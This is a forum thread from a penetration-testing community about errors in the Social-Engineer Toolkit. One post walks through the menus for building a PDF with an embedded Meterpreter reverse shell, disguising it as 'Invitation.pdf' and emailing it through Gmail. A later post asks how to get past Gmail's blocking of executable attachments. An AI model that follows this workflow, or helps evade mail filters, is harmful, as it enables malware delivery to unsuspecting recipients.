Results 1 to 5 of 5

Thread: Ruby error when using SET

  1. #1
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    1

    Unhappy Ruby error when using SET

    Hello there,
    I am complete begginer in using SET (Social Engineer Toolkit). And whatever i do i get error:

    SMTP AUTH extension not supported by server.
    global name 'base64' is not defined


    SET has finished delivering the emails.

    Do you want to setup a listener yes or no: yes
    /usr/bin/ruby: No such file or directory -- /root/set/msfconsole (LoadError)


    plz help.
    Sory for english.

  2. #2
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    19

    Default Re: Ruby error when using SET

    Can you post all the options you were using to get to that? I'm not able to reproduce myself but may help to see what you were doing in order to identify the bug.

    Thanks,

    -ReL

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    19

    Default Re: Ruby error when using SET

    Actually, try svn updating and see if that fixed the issue, for some reason base64 wasn't being imported properly...

  4. #4
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    4

    Default Re: Ruby error when using SET

    Hi there relik,

    I have a similar problem as the OP above. I have updated snv as you have guided above. It did not work, here is the exact process I went through on SET:

    Code:
    Select from the menu:
    
    1.  Spear-Phishing Attack Vectors
    2.  Website Attack Vectors
    3.  Infectious Media Generator
    4.  Create a Payload and Listener
    5.  Mass Mailer Attack
    6.  Teensy USB HID Attack Vector
    7.  SMS Spoofing Attack Vector
    8   Update the Metasploit Framework
    9.  Update the Social-Engineer Toolkit
    10. Help, Credits, and About
    11. Exit the Social-Engineer Toolkit
    
    Enter your choice: 1
    Code:
    Welcome to the SET E-Mail attack method. This module allows you
    to specially craft email messages and send them to a large (or small)
    number of people with attached fileformat malicious payloads. If you
    want to spoof your email address, be sure "Sendmail" is installed (it
    is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
    to SENDMAIL=ON.
    
    There are two options, one is getting your feet wet and letting SET do
    everything for you (option 1), the second is to create your own FileFormat
    payload and use it in your own attack. Either way, good luck and enjoy!
    
    1. Perform a Mass Email Attack
    2. Create a FileFormat Payload
    3. Create a Social-Engineering Template
    4. Return to Main Menu
    
    Enter your choice: 1
    Code:
    Select the file format exploit you want.
    The default is the PDF embedded EXE.
    
            ********** PAYLOADS **********
    
    1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
    2. Adobe Flash Player 'Button' Remote Code Execution
    3. Adobe CoolType SING Table 'uniqueName' Overflow
    4. Adobe Flash Player 'newfunction' Invalid Pointer Use
    5. Adobe Collab.collectEmailInfo Buffer Overflow
    6. Adobe Collab.getIcon Buffer Overflow
    7. Adobe JBIG2Decode Memory Corruption Exploit
    8. Adobe PDF Embedded EXE Social Engineering
    9. Adobe util.printf() Buffer Overflow
    10. Custom EXE to VBA (sent via RAR) (RAR required)
    11. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
    12. Adobe PDF Embedded EXE Social Engineering (NOJS)
    
    Enter the number you want (press enter for default): 8
    You have selected the default payload creation. SET will generate a normal PDF with embedded EXE
    .
    Code:
    1. Use your own PDF for attack
    2. Use built-in BLANK PDF for attack
    
    Enter your choice (return for default): 2
    Code:
    1. Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attac
    ker.
    2. Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to a
    ttacker.
    3. Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
    .
    4. Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
    5. Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterprete
    r
    6. Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote
     system.
    7. Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meter
    preter
    
    Enter the payload you want (press enter for default): 2
    Enter the port to connect back on (press enter for default): 5555[*] Generating fileformat exploit...[*] Payload creation complete.[*] All payloads get sent to the src/program_junk/template.pdf directory
    Code:
    As an added bonus, use the file-format creator in SET to create your attachment.
    
    Right now the attachment will be imported with filename of 'template.whatever'
    
    Do you want to rename the file?
    
    example Enter the new filename: moo.pdf
    
    1. Keep the filename, I don't care.
    2. Rename the file, I want to be cool.
    
    Enter your choice (enter for default): 2
    Enter the new filename: Invitation.pdf
    Filename changed, moving on...
    Code:
    Social Engineer Toolkit Mass E-Mailer
    
    There are two options on the mass e-mailer, the first would
    be to send an email to one individual person. The second option
    will allow you to import a list and send it to as many people as
    you want within that list.
    
    What do you want to do:
    
    1. E-Mail Attack Single Email Address
    2. E-Mail Attack Mass Mailer
    3. Return to main menu.
    
    Enter your choice: 1
    Code:
    Do you want to use a predefined template or craft
    a one time email template.
    
    1. Pre-Defined Template
    2. One-Time Use Email Template
    
    Enter your choice: 2
    Enter the subject of the email: Invitation
    Code:
    Do you want to send the message as html or plain?
    
    1. HTML
    2. Plain
    
    Enter your choice (enter for plain): 2
    Code:
    Enter the body of the message, hit return for a new line.
    
    Type your body and enter control+c when finished: Hello
    Next line of the body: This is a test
    Next line of the body: and i wonder if it will work
    Next line of the body:
    Next line of the body: regards
    Next line of the body: me
    Next line of the body: ^C
    Code:
    Enter who you want to send email to: me@hotmail.com
    Code:
    What option do you want to use?
    
    1. Use a GMAIL Account for your email attack.
    2. Use your own server or open relay
    
    Enter your choice: 1
    Enter your GMAIL email address: me@gmail.com
    Enter your password for gmail (it will not be displayed back to you):
    (552, '5.7.0 Our system detected an illegal attachment on your message. Please\n5.7.0 visit http                                              ://mail.google.com/support/bin/answer.py?answer=6590 to\n5.7.0 review our attachment guidelines.                                               l51sm3636185wer.2')
    (8, 'EOF occurred in violation of protocol')
    
    It appears your password was incorrect.
    Printing response: (8, 'EOF occurred in violation of protocol')
    Press enter to continue.
    Yet my password is correct. I even went onto my gmail account and changed it and tried the new password but it keeps failing. I think gmail has updated their security settings on allowing certain attachments. Do you think this S.E.T. method is now obsolete and that Google have patched this exploit?

    Thanks relik,
    Vrillon

    PS: Incase you are wondering what exactly I am trying to achieve, it is a reconstruction of the YouTube video called "Social Engineering- Toolkit" (watch?v=9f2ANmI2-RI). This video appears to be old, old enough that the menu content is different and so far I think I am following the correct steps using the new menu.

    Hopefully that can help any debugging process, would love to find out what is causing Gmail to refuse the attachment and stop complaining about it.

  5. #5
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    4

    Default Re: Ruby error when using SET

    It appears (with my error) that Gmail is treating my embedded PDF file as it would an EXE file.

    Gmail Rules:
    As a security measure to prevent potential viruses, Gmail doesn't allow you to send or receive executable files (such as files ending in .exe) that could contain damaging executable code. In addition, Gmail does not allow you to send or receive files that are corrupted.
    Gmail won't accept these types of files even if they are sent in a zipped (.zip, .tar, .tgz, .taz, .z, .gz) format. If this type of message is sent to your Gmail address, it is bounced back to the sender automatically.
    Other files that are denied:
    "ade", "adp", "bat", "chm", "cmd", "com", "cpl", "dll", "exe",
    "hta", "ins", "isp", "jse", "lib", "mde", "msc", "msp",
    "mst", "pif", "scr", "sct", "shb", "sys", "vb", "vbe",
    "vbs", "vxd", "wsc", "wsf", "wsh"
    So, it seems to be that Gmail can detected the embedded EXE file within the PDF file now.

    Is this method of the Social Engineering Toolkit now dead?

    If so, relik; would you be able to update this in the next update?

Similar Threads

  1. Goorecon and ruby
    By surj08 in forum BackTrack Bugs
    Replies: 2
    Last Post: 02-06-2010, 05:58 AM
  2. how to update to ruby 1.9?
    By b3r00tb4ck in forum OLD Newbie Area
    Replies: 1
    Last Post: 11-22-2009, 05:23 PM
  3. ruby scipts plz
    By imported_vvpalin in forum OLD Programming
    Replies: 3
    Last Post: 11-02-2009, 06:10 AM
  4. Python vs Ruby
    By kazalku in forum OLD Programming
    Replies: 5
    Last Post: 08-26-2009, 06:42 PM
  5. Learning ruby... My first ruby backdoor...
    By BigMac in forum OLD Programming
    Replies: 9
    Last Post: 06-03-2009, 11:32 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •